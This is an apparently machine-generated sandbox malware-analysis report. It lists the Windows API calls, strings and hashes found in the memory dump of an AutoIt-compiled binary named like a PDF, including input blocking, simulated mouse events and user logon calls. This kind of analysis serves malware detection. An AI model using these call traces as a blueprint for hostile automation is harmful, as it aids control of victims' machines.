                                                      • Part of subcall function 0036344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0038BDC3,00000000,?,?,?,?,0038BF70,00000000,?), ref: 00363453
                                                      • Part of subcall function 0036344A: __aulldiv.LIBCMT ref: 00363473
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID:
                                                    • API String ID: 2893107130-0
                                                    • Opcode ID: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                                    • Instruction ID: d3e5b90961e1901f759e94eff278dbc957959addf64fe2b59bca7eb20307f237
                                                    • Opcode Fuzzy Hash: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                                    • Instruction Fuzzy Hash: 3121A2726346118BC72ACF28C481A52FBE5EB95311B248E7DE4E5CF2C0CB74B905CB54
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00396ACA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003874DE
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0037AD3E), ref: 0037B124
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036818F
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3728558374-0
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 0039A2FE
                                                    • DeleteObject.GDI32(00000000), ref: 0039A310
                                                    • DestroyWindow.USER32 ref: 0039A31E
                                                    • GetDesktopWindow.USER32 ref: 0039A338
                                                    • GetWindowRect.USER32(00000000), ref: 0039A33F
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0039A480
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0039A490
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A4D8
                                                    • GetClientRect.USER32(00000000,?), ref: 0039A4E4
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0039A51E
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A540
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A553
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A55E
                                                    • GlobalLock.KERNEL32(00000000), ref: 0039A567
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A576
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0039A57F
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A586
                                                    • GlobalFree.KERNEL32(00000000), ref: 0039A591
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A5A3
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003CD9BC,00000000), ref: 0039A5B9
                                                    • GlobalFree.KERNEL32(00000000), ref: 0039A5C9
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0039A5EF
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0039A60E
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A630
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A81D
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 003AD2DB
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AD30C
                                                    • GetSysColor.USER32(0000000F), ref: 003AD318
                                                    • SetBkColor.GDI32(?,000000FF), ref: 003AD332
                                                    • SelectObject.GDI32(?,00000000), ref: 003AD341
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD36C
                                                    • GetSysColor.USER32(00000010), ref: 003AD374
                                                    • CreateSolidBrush.GDI32(00000000), ref: 003AD37B
                                                    • FrameRect.USER32(?,?,00000000), ref: 003AD38A
                                                    • DeleteObject.GDI32(00000000), ref: 003AD391
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 003AD3DC
                                                    • FillRect.USER32(?,?,00000000), ref: 003AD40E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AD439
                                                      • Part of subcall function 003AD575: GetSysColor.USER32(00000012), ref: 003AD5AE
                                                      • Part of subcall function 003AD575: SetTextColor.GDI32(?,?), ref: 003AD5B2
                                                      • Part of subcall function 003AD575: GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                                      • Part of subcall function 003AD575: GetSysColor.USER32(0000000F), ref: 003AD5D3
                                                      • Part of subcall function 003AD575: GetSysColor.USER32(00000011), ref: 003AD5F0
                                                      • Part of subcall function 003AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                                      • Part of subcall function 003AD575: SelectObject.GDI32(?,00000000), ref: 003AD60F
                                                      • Part of subcall function 003AD575: SetBkColor.GDI32(?,00000000), ref: 003AD618
                                                      • Part of subcall function 003AD575: SelectObject.GDI32(?,?), ref: 003AD625
                                                      • Part of subcall function 003AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                                      • Part of subcall function 003AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                                      • Part of subcall function 003AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                                      • Part of subcall function 003AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 3521893082-0
                                                    • Opcode ID: 0c99c9222b683412064073be6bc6b97647a4f1eab7e525e317a07406b3926656
                                                    • Instruction ID: 2a08d7f8bdd0023a7b5e55fee49ffd43d5aac24c666b6d9dc73d57ae658323d2
                                                    • Opcode Fuzzy Hash: 0c99c9222b683412064073be6bc6b97647a4f1eab7e525e317a07406b3926656
                                                    • Instruction Fuzzy Hash: E2915E71408301BFDB129F64DC48E6BBBADFB8A325F100A29F962D65E0D771E944CB52
                                                    APIs
                                                    • DestroyWindow.USER32 ref: 0035B98B
                                                    • DeleteObject.GDI32(00000000), ref: 0035B9CD
                                                    • DeleteObject.GDI32(00000000), ref: 0035B9D8
                                                    • DestroyIcon.USER32(00000000), ref: 0035B9E3
                                                    • DestroyWindow.USER32(00000000), ref: 0035B9EE
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 003BD2AA
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003BD2E3
                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003BD711
                                                      • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                                    • SendMessageW.USER32 ref: 003BD758
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003BD76F
                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 003BD785
                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 003BD790
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                                    • Instruction ID: 02220358ca7dfa75f05fd2246a56ad2e17666b41c9b5887f96d1e26fc11f5668
                                                    • Opcode Fuzzy Hash: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                                    • Instruction Fuzzy Hash: 09129C34204201DFDB26CF28C884FA9BBE5FF45309F554569FA89CBA62DB31E845CB91
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00399F83
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0039A042
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0039A080
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0039A092
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0039A0D8
                                                    • GetClientRect.USER32(00000000,?), ref: 0039A0E4
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0039A128
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0039A137
                                                    • GetStockObject.GDI32(00000011), ref: 0039A147
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0039A14B
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0039A15B
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0039A164
                                                    • DeleteDC.GDI32(00000000), ref: 0039A16D
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0039A19B
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0039A1B2
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0039A1ED
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0039A201
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0039A212
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0039A242
                                                    • GetStockObject.GDI32(00000011), ref: 0039A24D
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0039A258
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0039A262
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 3f1855f2312128b6081f0bb2b52b682dbc1314f985e89dc0dc564d43c59a904c
                                                    • Instruction ID: b140fcbb550ab5a52d340052a81c4331122183ec95d97ddc764e047426cc14d1
                                                    • Opcode Fuzzy Hash: 3f1855f2312128b6081f0bb2b52b682dbc1314f985e89dc0dc564d43c59a904c
                                                    • Instruction Fuzzy Hash: CAA13D71A40215BFEB15DFA9DD4AFAEBBA9EB04710F004115FA15EB2E0D7B0AD40CB64
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038DBD6
                                                    • GetDriveTypeW.KERNEL32(?,003DDC54,?,\\.\,003DDC00), ref: 0038DCC3
                                                    • SetErrorMode.KERNEL32(00000000,003DDC54,?,\\.\,003DDC00), ref: 0038DE29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                                    • Instruction ID: cf7f2e8e7e5f194033834595aa27f857ab3fb6b08c41a637c32d044737ca2b00
                                                    • Opcode Fuzzy Hash: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                                    • Instruction Fuzzy Hash: 2B519F30248306AB8613FF11C8A28B9B7A4FF94701F24599AF5079F6E5DB60ED49DB42
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 376a486b56faa44feee34b1cf5b9bb6fd3488671c6228a105510aed2acfa267a
                                                    • Instruction ID: e4142bd5caf041f7a3e45fc60a2a8f2da9c1b942794d1259e0ebee72515afa8d
                                                    • Opcode Fuzzy Hash: 376a486b56faa44feee34b1cf5b9bb6fd3488671c6228a105510aed2acfa267a
                                                    • Instruction Fuzzy Hash: A4812731641209BBCB63AE64DC82FFF77A9EF15304F049125FA05AF5CAEB60E905C291
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,003DDC00), ref: 003A6449
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 3964851224-45149045
                                                    • Opcode ID: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                                    • Instruction ID: 97e137ba21a01f43c48c4d887496b7afd8e5bb568f2194f96c877290e36e70e7
                                                    • Opcode Fuzzy Hash: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                                    • Instruction Fuzzy Hash: 4BC1A1342042158BCB17EF10C552E6EB7E9EF96344F094858F8965F2B2DB25EE4ACB42
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 003AD5AE
                                                    • SetTextColor.GDI32(?,?), ref: 003AD5B2
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                                    • GetSysColor.USER32(0000000F), ref: 003AD5D3
                                                    • CreateSolidBrush.GDI32(?), ref: 003AD5D8
                                                    • GetSysColor.USER32(00000011), ref: 003AD5F0
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                                    • SelectObject.GDI32(?,00000000), ref: 003AD60F
                                                    • SetBkColor.GDI32(?,00000000), ref: 003AD618
                                                    • SelectObject.GDI32(?,?), ref: 003AD625
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003AD6BF
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 003AD6DD
                                                    • DrawFocusRect.USER32(?,?), ref: 003AD6E8
                                                    • GetSysColor.USER32(00000011), ref: 003AD6F6
                                                    • SetTextColor.GDI32(?,00000000), ref: 003AD6FE
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003AD712
                                                    • SelectObject.GDI32(?,003AD2A5), ref: 003AD729
                                                    • DeleteObject.GDI32(?), ref: 003AD734
                                                    • SelectObject.GDI32(?,?), ref: 003AD73A
                                                    • DeleteObject.GDI32(?), ref: 003AD73F
                                                    • SetTextColor.GDI32(?,?), ref: 003AD745
                                                    • SetBkColor.GDI32(?,?), ref: 003AD74F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1996641542-0
                                                    • Opcode ID: e65657d73076233427a5d18886541e49ce51c6def1c8a9d09f07e7e753f767ed
                                                    • Instruction ID: e4e454884cb07f9d8975261b7b2dd10c0ada7fcf2f02fe52f605fc84fc7606dc
                                                    • Opcode Fuzzy Hash: e65657d73076233427a5d18886541e49ce51c6def1c8a9d09f07e7e753f767ed
                                                    • Instruction Fuzzy Hash: 44513B71900218AFDB129FA8DC48EAEBB79FB09324F154525F916EB2A1D771AA40CF50
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003AB7B0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB7C1
                                                    • CharNextW.USER32(0000014E), ref: 003AB7F0
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003AB831
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003AB847
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB858
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003AB875
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003AB8C7
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003AB8DD
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AB90E
                                                    • _memset.LIBCMT ref: 003AB933
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003AB97C
                                                    • _memset.LIBCMT ref: 003AB9DB
                                                    • SendMessageW.USER32 ref: 003ABA05
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 003ABA5D
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 003ABB0A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003ABB2C
                                                    • GetMenuItemInfoW.USER32(?), ref: 003ABB76
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003ABBA3
                                                    • DrawMenuBar.USER32(?), ref: 003ABBB2
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003ABBDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0
                                                    • API String ID: 1073566785-4108050209
                                                    • Opcode ID: 88bedbbfa7d3d28bde714ca07456b7cc932a872466842e9165e25b3a068f3b86
                                                    • Instruction ID: 714feefb2316ca498c89e77c9f122541ea27b82f197cedc9d0a6462d59663963
                                                    • Opcode Fuzzy Hash: 88bedbbfa7d3d28bde714ca07456b7cc932a872466842e9165e25b3a068f3b86
                                                    • Instruction Fuzzy Hash: 24E1A071900218AFDF129FA5CC84EEEBB7CFF06714F10816AF919AA192D7759A41CF60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Foreground
                                                    • String ID: ACTIVE$ALL$CLASS$H+?$HANDLE$INSTANCE$L+?$LAST$P+?$REGEXPCLASS$REGEXPTITLE$T+?$TITLE
                                                    • API String ID: 62970417-157867648
                                                    • Opcode ID: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                                    • Instruction ID: 1520f3261fa60d5f09bdcce4877ea6090edaf3b500b79eaf3a5036cb4ba45563
                                                    • Opcode Fuzzy Hash: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                                    • Instruction Fuzzy Hash: C0D184305086469BCB07EF10C4819EBBBF4BF54348F504A19F95A9F9A1DB30F99ACB91
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 003A778A
                                                    • GetDesktopWindow.USER32 ref: 003A779F
                                                    • GetWindowRect.USER32(00000000), ref: 003A77A6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A7808
                                                    • DestroyWindow.USER32(?), ref: 003A7834
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003A785D
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003A787B
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003A78A1
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 003A78B6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003A78C9
                                                    • IsWindowVisible.USER32(?), ref: 003A78E9
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003A7904
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003A7918
                                                    • GetWindowRect.USER32(?,?), ref: 003A7930
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 003A7956
